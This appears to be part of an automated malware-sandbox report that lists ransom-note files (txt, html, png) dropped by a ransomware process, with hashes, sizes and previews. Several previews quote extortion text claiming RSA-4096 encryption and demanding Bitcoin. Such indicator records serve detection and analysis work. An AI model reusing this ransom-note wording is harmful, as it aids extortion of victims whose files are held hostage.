                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
